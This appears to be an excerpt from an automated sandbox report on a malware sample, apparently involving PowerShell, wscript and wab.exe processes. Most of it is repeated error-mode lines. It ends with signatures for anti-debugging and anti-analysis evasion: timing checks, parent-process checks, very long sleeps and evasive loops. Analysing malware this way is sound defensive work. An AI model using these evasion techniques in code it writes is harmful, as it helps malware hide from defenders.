Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB096E rdtsc 25_2_21FB096E
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5274 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4625 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6358 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3499 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3703 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2760 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 703 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6097 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3643 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6995
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2518
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 571
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.5 %
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
